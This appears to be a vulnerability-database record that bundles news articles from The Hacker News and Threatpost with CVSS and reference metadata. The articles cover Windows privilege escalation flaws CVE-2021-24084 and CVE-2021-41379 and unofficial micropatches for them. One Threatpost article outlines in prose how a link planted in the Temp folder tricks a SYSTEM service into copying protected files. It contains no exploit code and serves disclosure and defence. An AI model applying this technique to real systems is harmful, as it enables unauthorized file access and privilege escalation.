Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS

2021-11-30T09:11:00

Description

[![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>) Unofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems. Tracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files. Security researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates. But as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>). [![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>) "Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them," 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week. However, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer. Neither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted — * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates CVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges. Then last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022. Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "description": "[![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-11-30T09:11:00", "modified": "2021-12-03T03:42:06", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9}, "severity": "MEDIUM", "exploitabilityScore": 3.9, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "immutableFields": [], "lastseen": "2022-05-09T12:37:52", "viewCount": 90, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"]}, {"type": "githubexploit", "idList": ["291894F9-38D4-5877-8B8F-EF46C6D23B82", "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12250", "KLA12259", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-34484", "MS:CVE-2021-41379"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_NOV_5007186.NASL", "SMB_NT_MS21_NOV_5007189.NASL", "SMB_NT_MS21_NOV_5007192.NASL", "SMB_NT_MS21_NOV_5007205.NASL", "SMB_NT_MS21_NOV_5007206.NASL", "SMB_NT_MS21_NOV_5007207.NASL", "SMB_NT_MS21_NOV_5007215.NASL", "SMB_NT_MS21_NOV_5007233.NASL", "SMB_NT_MS21_NOV_5007245.NASL", "SMB_NT_MS21_NOV_5007246.NASL", "SMB_NT_MS21_NOV_5007255.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "THREATPOST:E405927D7A8A492019D1B6552C396830"]}, {"type": "zdi", "idList": ["ZDI-21-1308", "ZDI-21-178", "ZDI-21-966"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-34484"]}, {"type": "githubexploit", "idList": ["3AA8003E-06D3-57B2-BB7E-43616295A4B7"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-34484"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "THREATPOST:E405927D7A8A492019D1B6552C396830"]}, {"type": "zdi", "idList": ["ZDI-21-178"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24084", "epss": "0.000440000", "percentile": "0.105180000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34484", "epss": "0.001340000", "percentile": "0.468400000", "modified": "2023-03-17"}, {"cve": "CVE-2021-41379", "epss": "0.955530000", "percentile": "0.989620000", "modified": "2023-03-18"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1659988328, "score": 1684013037, "epss": 1679165106}, "_internal": {"score_hash": "9d17a94d01f6911dbba4b1c2eabd2835"}}

{"threatpost": [{"lastseen": "2021-11-30T01:40:15", "description": "Attackers are actively exploiting a Windows Installer zero-day vulnerability that was discovered when a patch Microsoft issued for another security hole inadequately fixed the original and unrelated problem.\n\nOver the weekend, security researcher [Abdelhamid Naceri](<https://github.com/klinix5>) discovered a Windows Installer elevation-of-privilege vulnerability tracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) that Microsoft [patched](<https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/>) a couple of weeks ago as part of its November [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/>).\n\nHowever, after examining the fix, Naceri found a bypass as well as an even more concerning zero-day privilege-elevation bug. The researcher posted a [proof of concept (POC) exploit](<https://github.com/klinix5/InstallerFileTakeOver>) Tuesday on GitHub for the newly discovered bug that he said works on all currently-supported versions of Windows.\n\nIf exploited, the POC, called InstallerFileTakeOver, gives an actor administration privileges in Windows 10, Windows 11 and Windows Server when logged onto a Windows machine with Edge installed.\n\n## **Peer Research Confirms Exploit and Active Attacks**\n\nResearchers at Cisco Talos Security Intelligence and Research Group as well as others confirmed the POC can be reproduced as well as corroborating evidence that threat actors were already exploiting the bug.\n\n\u201cThis vulnerability affects every version of Microsoft Windows, including fully patched Windows 11 and Server 2022,\u201d according to a [post on the Cisco Talos blog](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) by\n\nJaeson Schultz, technical leader for Cisco Talos. \u201cTalos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability.\u201d\n\nOther researchers also confirmed on Twitter that the POC functions as advertised to deliver local privilege escalation.\n\n\u201cCan confirm this works, local priv esc,\u201d [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F>) security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog>), who said he tested it on Windows 10 20H2 and Windows 11. \u201cThe prior patch MS issued didn\u2019t fix the issue properly.\u201d\n\n## **Discovery and More Details**\n\nAs detailed by Microsoft, CVE-2021-41379 is a Windows Installer elevation of privilege vulnerability with a rating of low on the Common Vulnerability Scoring System.\n\n\u201cAn attacker would only be able to delete targeted files on a system,\u201d according to [Microsoft\u2019s notes](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) on the flaw. \u201cThey would not gain privileges to view or modify file contents.\u201d\n\nHowever, Microsoft\u2019s patch for the bug did not fix the vulnerability correctly, allowing Naceri to bypass it during his analysis of the patch, he said in his GitHub post of the POC.\n\nHowever, that bypass was small potatoes compared to a variant of CVE-2021-41379 that he discovered during his research that is \u201cmore powerful than the original one,\u201d which is why Naceri chose to publish a POC of that flaw instead, he wrote.\n\nThe code Naceri released leverages the discretionary access control list (DACL) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI file, allowing an attacker to run code as an administrator, Cisco Talos\u2019 Schultz explained in his post.\n\n## **Wait for the Patch**\n\nThe associated POC works in every supporting windows installation, including Windows 11 and Server 2022 with the November 2021 patch, as well as in server installations, Naceri wrote.\n\n\u201cWhile group policy by default doesn\u2019t allow standard users to do any MSI operation, the administrative install feature thing seems to be completely bypassing group policy,\u201d he wrote.\n\nDue to the \u201ccomplexity\u201d of the vulnerability, Naceri said that the best workaround available for the flaw at this time \u201cis to wait Microsoft to release a security patch.\n\n\u201cAny attempt to patch the binary directly will break Windows installer,\u201d he wrote, adding that those affected should \u201cwait and see how Microsoft will screw the patch again\u201d before taking any mitigation action.\n\nA Microsoft spokesperson told BleepingComputer that the company is aware of Naceri\u2019s disclosure and \u201cwill do what is necessary\u201d to keep customers \u201csafe and protected,\u201d according to [a published report](<https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/>).\n\n\u201cAn attacker using the methods described must already have access and the ability to run code on a target victim\u2019s machine,\u201d the spokesperson said, according to the report.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d an on-demand Town Hall with Eric Kaiser, Uptycs\u2019 senior security engineer, and find out how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ to access the on-demand event!_**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:09:18", "type": "threatpost", "title": "Attackers Actively Target Windows Installer Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-41379"], "modified": "2021-11-24T14:09:18", "id": "THREATPOST:E405927D7A8A492019D1B6552C396830", "href": "https://threatpost.com/attackers-target-windows-installer-bug/176558/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-30T01:39:23", "description": "An unpatched Windows security vulnerability could allow information disclosure and local privilege escalation (LPE), researchers have warned. The issue (CVE-2021-24084) has yet to get an official fix, making it a zero-day bug \u2013 but a micropatch has been rolled out as a stop-gap measure.\n\nSecurity researcher Abdelhamid Naceri [originally reported](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) the vulnerability as an information-disclosure issue in October 2020, via Trend Micro\u2019s Zero-Day Initiative (ZDI). Though Microsoft had told him it was planning a fix for last April, the patch has not yet been forthcoming.\n\nThen, this month, Naceri discovered that CVE-2021-24084 could also be exploited for LPE, so that non-admin Windows users can read arbitrary files even if they do not have permissions to do so. In a proof-of-concept exploit, he demonstrated that it\u2019s possible to copy files from a chosen location into a Cabinet (.CAB) archive that the user can then open and read.\n\n> I mean this is still unpatched and allow LPE if shadow volume copies are enabled; \nBut I noticed that it doesn't work on windows 11 <https://t.co/HJcZ6ew8PO>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 15, 2021](<https://twitter.com/KLINIX5/status/1460338968780804098?ref_src=twsrc%5Etfw>)\n\nThe process for doing so is very similar to the [LPE exploitation approach](<https://www.hackingarticles.in/windows-privilege-escalation-hivenightmare/>) for the HiveNightmare bug, [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)**,** which affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers.\n\n\u201cAs [HiveNightmare/SeriousSAM](<https://threatpost.com/win-10-serioussam/168034/>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\u201d Mitja Kolsek, head of the 0patch team, noted in a [recent posting](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>). \u201cWe confirmed this [for the zero-day and were] able to run code as local administrator.\u201d\n\n> It's still hilarious that this bug is still unpatched and fully functional on a windows 10 21H1 with october patch. <https://t.co/HO4Kwbql9z>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 2, 2021](<https://twitter.com/KLINIX5/status/1455500874596356098?ref_src=twsrc%5Etfw>)\n\n## **Windows 10 Bug Exploitation Details**\n\nSpecifically, the vulnerable functionality exists under the \u201caccess work or school\u201d settings, according to the opatch writeup. A normal user can make use of the \u201cexport your management log files\u201d function, which triggers the Device Management Enrollment Service.\n\n\u201cThis service first copies some log files to the C:\\ProgramData\\Microsoft\\MDMDiagnostics folder, and then packages them into a .CAB file whereby they\u2019re temporarily copied to C:\\Windows\\Temp folder,\u201d explained Kolsek. \u201cThe resulting .CAB file is then stored in the C:\\Users\\Public\\Public Documents\\MDMDiagnostics folder, where the user can freely access it.\u201d\n\nHowever, when the .CAB file is copied into the Windows Temp folder, a local attacker can pounce. The adversary would simply create a file shortcut link with a predictable file name that would normally be used in the normal export process, pointing to a target folder or file that the attacker would like to access.\n\n\u201cSince the Device Management Enrollment Service runs as Local System, it can read any system file that the attacker can\u2019t,\u201d Kolsek said.\n\nThere are two pre-requisites for achieving LPE, Kolsek noted.\n\n\u201cSystem protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters,\u201d he said. And, \u201cat least one local administrator account must be enabled on the computer, or at least one \u2018administrators\u2019 group member\u2019s credentials cached.\u201d\n\nTo address the issue, the free micropatch simply checks for the presence of short-cut links during the .CAB file creation.\n\n\u201cThe function we patched is CollectFileEntry inside mdmdiagnostics.dll. This is the function that copies files from C:\\Windows\\Temp folder into the .CAB file, and can be tricked into reading some other files instead,\u201d Kolsek explained. \u201cOur patch is placed immediately before the call to CopyFileW that opens the source file for copying, and uses the GetFinalPathNameByHandleW function to determine whether any junctions or other types of links are used in the path. If they are, our patch makes it look as it the CopyFileW call has failed, thereby silently bypassing the copying of any file that doesn\u2019t actually reside in C:\\Windows\\Temp.\u201d\n\nVulnerable versions of Windows include:\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nWindows Servers are not affected, and neither are Windows 11, Windows 10 v1803 and older Windows 10 versions.\n\nMicrosoft did not immediately return a request for comment on the timeline for an official patch.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T17:47:10", "type": "threatpost", "title": "Unpatched Windows 10 Zero-Day Allows Privileged File Access", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-36934"], 